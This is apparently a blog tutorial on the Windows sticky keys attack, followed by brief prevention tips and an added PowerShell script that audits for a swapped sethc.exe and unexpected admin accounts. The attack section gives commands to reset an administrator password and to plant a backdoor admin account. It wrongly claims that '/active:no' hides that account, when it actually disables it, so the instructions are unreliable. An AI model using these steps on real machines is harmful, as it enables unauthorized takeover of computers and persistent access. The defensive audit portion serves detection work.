Sticky keys attack (Part 2)

This is part 2 of my intro to the sticky keys attack. After rebooting the system, we can press the Shift key 5 times to open a cmd prompt (the replacement for sethc.exe).


Now we can use the GUI or the cmd to install a backdoor user.

Method 1: GUI

In the cmd prompt, we type: control userpasswords2

Choose a user that is part of the administrators group and reset the password or create one.



Method 2: Use the cmd

Get the administrators list: net localgroup administrators

(You'll get a list of all users that belong to the local admin group.)

Change the password by typing: net user "username" password

In this case, rootsh3ll is the username and pass is the new password.

Log in with the new credentials. Enjoy!

How to create a backdoor user

Create a new user: net user /add hiddenuser secretpassword

Add the user to the local admin group: net localgroup administrators hiddenuser /add

Set the user to hidden: net user hiddenuser /active:no


Check backdoor user visibility: control userpasswords2

The hiddenuser should not be shown.

Preventing the sticky keys attack

  • Encrypt your hard drive
  • Set a BIOS password
  • Disable additional boot devices (flash drives/USB/CD/DVD)
  • Turn off Sticky keys:
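
To check an existing machine for the changes described in this post, the following PowerShell audit is an added example, not part of the original post. It tests whether sethc.exe has been swapped for cmd.exe and lists local administrator accounts so that reset passwords and disabled (/active:no) accounts stand out. The function names are hypothetical, and the OriginalFilename comparison is a heuristic that assumes the genuine binary reports a name starting with "sethc".

```powershell
# Added audit example (not from the original post). Run in an elevated PowerShell 5.1+.
$sys32 = Join-Path $env:SystemRoot 'System32'

function Test-SethcReplaced {
    # $true if sethc.exe is byte-identical to cmd.exe, or if its version
    # resource does not identify it as sethc (heuristic, see lead-in).
    param(
        [string]$Sethc = (Join-Path $sys32 'sethc.exe'),
        [string]$Cmd   = (Join-Path $sys32 'cmd.exe')
    )
    if (-not (Test-Path $Sethc)) { return $true }   # a missing file is also a finding
    $sethcHash = (Get-FileHash -Path $Sethc -Algorithm SHA256).Hash
    $cmdHash   = (Get-FileHash -Path $Cmd   -Algorithm SHA256).Hash
    $origName  = (Get-Item $Sethc).VersionInfo.OriginalFilename
    return ($sethcHash -eq $cmdHash) -or ($origName -notmatch '^sethc')
}

function Get-LocalAdminReview {
    # Resolve the Administrators group by its well-known SID so the check
    # also works on non-English installations.
    Get-LocalGroupMember -SID 'S-1-5-32-544' |
        Where-Object { $_.PrincipalSource -eq 'Local' } |
        ForEach-Object { Get-LocalUser -SID $_.SID -ErrorAction SilentlyContinue } |
        Select-Object Name, Enabled, PasswordLastSet, LastLogon,
            @{ Name = 'DisabledNonBuiltin'
               # The built-in Administrator (RID 500) is often disabled by
               # default, so it is not flagged here.
               Expression = { (-not $_.Enabled) -and ($_.SID.Value -notmatch '-500$') } }
}

if (Test-SethcReplaced) {
    Write-Warning 'sethc.exe does not look like the original binary (possible sticky keys backdoor).'
} else {
    Write-Output 'sethc.exe looks unmodified.'
}

# Most recently changed passwords first: an unexpected recent PasswordLastSet on an
# admin account, or a row with DisabledNonBuiltin = True, deserves a closer look.
Get-LocalAdminReview |
    Sort-Object PasswordLastSet -Descending |
    Format-Table -AutoSize
```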



